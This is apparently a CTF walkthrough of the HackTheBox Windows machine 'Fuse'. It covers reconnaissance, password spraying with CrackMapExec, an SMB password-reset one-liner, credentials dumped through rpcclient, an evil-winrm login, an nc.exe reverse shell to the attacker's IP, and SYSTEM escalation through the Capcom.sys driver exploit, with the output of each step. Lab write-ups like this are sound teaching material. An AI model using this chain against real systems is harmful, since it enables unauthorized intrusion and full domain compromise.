Fuse Walkthrough – HackTheBox

Machine Fuse
Target OS Windows
Difficulty Medium
Maker egre55

Today we’re going to solve another CTF machine " Fuse ". It is now a retired box and can be accessible to VIP members.

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sS -sU -T4 -A -v 10.10.10.193

53/tcp   open  domain?                                                                                                                                                                    
| fingerprint-strings:                                                                                                                                                                    
|   DNSVersionBindReqTCP: 
|     version                
|_    bind                         
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods:                                                                                                                                                                           
|_  Potentially risky methods: TRACE                                                         
|_http-server-header: Microsoft-IIS/10.0                                                     
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-22 16:35:04Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

Nmap reveals some interesting ports.

Ports Scanning Summary:

  • Port 53: DNS
  • Port 80: HTTP Service on Microsoft-IIS/10.0
  • Port 88: kerberos-sec - Active Directory authentication protocol
  • Port 135,593: - Windows RPC & RPC over HTTP 1.0
  • Port 445: SMB
  • Port 389,3268,3269: LDAP & LDAP GC
  • Port 636: LDAPS
  • Port 464: kpasswd5 (Kerberos Change/Set password )
  • Port 9389: .NET Remoting Services
  • Port 5985: WinRM
  • Port 49666,49667,49675,49676,49679,49695,49754 - Other Windows RPC ports

Important Notes:

  • Netbios name: FUSE
  • Domain name: fabricorp.local
  • OS: Windows Server 2016 Standard 14393

Enumerating HTTP - Port 80

If we browse the HTTP://10.10.10.193 we’ll get redirected to fuse.fabricorp.local/papercut/logs/html/index.htm So, let’s add this to our /etc/hosts file.

10.10.10.193 fuse.fabricorp.local fabricorp.local

Now, navigate to HTTP://10.10.10.193

It is running PaperCut Print Logger and has 3 print logs available. By checking each of these logs we found few interesting strings.

pmerton
tlavel
sthompson
bhult
administrator

ffuf

I ran ffuf directory brute-forcing tool and found nothing.

ffuf -w $COMMON -u http://fuse.fabricorp.local/FUZZ

Enumerating SMB - Port 445

Let’s fetch some information using CrackMapExec (cme) tool.

[email protected]:~# cme smb 10.10.10.193
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)

Null session not allowed we need creds to retrieve SMB shares.

[email protected]:~# cme smb 10.10.10.193 -u '' -p ''
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\: STATUS_ACCESS_DENIED 

Enumerating RPC - Port 135

Using null session we can connect to RPC and try to retrieve information.

[email protected]:~# rpcclient 10.10.10.193 -U ''
Enter WORKGROUP\'s password: 
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 

Credential Hunting

We couldn’t fetch out much information through SMB and RPC enumeration, we don’t have much information to move ahead but we do have a potential list of usernames via print logs that give us a chance to try password spraying.

Password Spraying

We can generate our wordlist using cewl.

cewl -m5 -d5 -w passwords http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

Brute Force

We’ll brute force using CrackMapExec, with --continue-on-success flag since we got multiple users we would like it to keep running even after successful login.

[email protected]:# cme smb 10.10.10.193 -u usernames -p passwords --continue-on-success | grep -v FAILURE

SMB         10.10.10.193    445    FUSE             [*] Windows 10.0 Build 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 

We got two users with the password “Fabricorp01” status STATUS_PASSWORD_MUST_CHANGE it seems they both have the correct password but needed an update.

Password Updating

So, now we got bhult and tlavel user to update their password we’re going to use smbpasswd tool.

smbpasswd -r 10.10.10.193 -U bhult

Even after we update the password it seems the box is resetting the password to default every minute or so.

Shell as svc-print

Now, that we got the password let’s list the shares using smbclient.

Password for smb being reset every minute so to automate the process a little using a one-liner bash script.

if echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then echo "Password $pass still good"; else pass=$(date +%s | md5sum | base64 | head -c7; echo .); (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | smbpasswd -r 10.10.10.193 -s bhult; echo "password reset to $pass"; fi;

Code with spaces

if echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then 
  echo "Password $pass still good"; 
else 
  pass=$(date +%s | md5sum | base64 | head -c7; echo .); 
  (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | 
    smbpasswd -r 10.10.10.193 -s bhult; 
  echo "password reset to $pass"; 
fi; 
[command here]

SMB - bhult

smbclient -L //10.10.10.193/ -U bhult

Let’s list SMB shares with more information using CrackMapExec tool.

cme smb 10.10.10.193 -u bhult -p 'ODMxM2J.' --shares

SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [+] fabricorp.local\bhult:ODMxM2J. 
SMB         10.10.10.193    445    FUSE             [+] Enumerated shares
SMB         10.10.10.193    445    FUSE             Share           Permissions     Remark
SMB         10.10.10.193    445    FUSE             -----           -----------     ------
SMB         10.10.10.193    445    FUSE             ADMIN$                          Remote Admin
SMB         10.10.10.193    445    FUSE             C$                              Default share
SMB         10.10.10.193    445    FUSE             HP-MFT01                        HP-MFT01
SMB         10.10.10.193    445    FUSE             IPC$                            Remote IPC
SMB         10.10.10.193    445    FUSE             NETLOGON        READ            Logon server share 
SMB         10.10.10.193    445    FUSE             print$          READ            Printer Drivers
SMB         10.10.10.193    445    FUSE             SYSVOL          READ            Logon server share 

The user bhult has read permission on three shares and I tried connecting with print$ unfortunately it didn’t work and there’s a bunch of .dll libraries and config files on other shares.

RPC - bhult

We tried listing SMB shares but couldn’t find anything interesting let’s try RPC information dump.

Let’s use the oneliner script along with rpcclient.

if echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then echo "Password $pass still good"; else pass=$(date +%s | md5sum | base64 | head -c7; echo .); (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | smbpasswd -r 10.10.10.193 -s bhult; echo "password reset to $pass"; fi; rpcclient -U bhult%${pass} 10.10.10.193

Let’s dump users with enumdomusers.

image

Let’s separate it using awk command.

cat newusers.txt | awk -F] '{print $1}' | awk -F[ '{print $2}'

There are more users than we thought we had but let’s enumerate printers using enumprinters.

And we got the password saved in the description of printers.

[email protected]$1

Since we found new users let’s check which user allowed to connect using WinRM.

cme smb 10.10.10.193 -u newusers.txt -p '[email protected]$1' --continue-on-success

We found two valid users for that password. We couldn’t find anything more in SMB shares with new credentials as well so let’s move forward with WinRM.

WinRM Shell

evil-winrm -i 10.10.10.193 -u svc-print -p '[email protected]$1'

The shell was unstable so let’s spawn a proper shell using nc.exe.

./nc.exe 10.10.14.23 1337 -e powershell.exe

Now we have read our user.txt flag.

image

Privilege Escalation

Now that we got a proper and stable shell we can enumerate to escalate our privilege.

The first thing we do is list privilege information using whoami /priv.

SeLoadDriverPrivilege is enabled and the user svc-print is a member of group Printer Operators and it’s quite dangerous to allow the user to load kernel drivers which leads to code execution with privilege escalation.

We have to follow the method in two steps to root the machine.

  • Load a vulnerable driver (Capcom.sys) in the system;
  • Exploit the driver to get an elevated shell.

Capcom.sys

Download POC from TarlogicSecurity

wget https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp.

Now, wget this as well.

wget https://github.com/GregoryGraindorge/ExploitCapcomMod/blob/main/Capcom.sys

EOPLoadDriver.cpp isn’t compiled yet so we have to compile it. After compiling as LoadDriver.exe let’s transfer it to our targeted machine.

Create a temp folder and copy LoadDriver.exe and Capcom.sys inside.

cd \temp
copy z:\LoadDriver.exe .
copy z:\Capcom.sys .

Load the driver inside the system. (Don’t use double backslash !!!)

C:\temp> .\LoadDriver.exe System\CurrentControlSet\ThanksForReading C:\temp\Capcom.sys

[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\ThanksForReading
NTSTATUS: c0000033, WinError: 0

Exploit

Let’s abuse the driver and use this exploit.

To use it, download or compile ExploitCapcom.exe and upload it on the target machine. Then you can run a command like this:

.\ExploitCapcom.exe "whoami"

[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001D89AC60008
[+] Shellcode was executed
[+] Token stealing was successful
nt authority\system
.\ExploitCapcom.exe "type \users\administrator\desktop\root.txt"

*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe "type \users\administrator\desktop\root.txt"
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 0000025BB0C20008
[+] Shellcode was executed
[+] Token stealing was successful
a53127...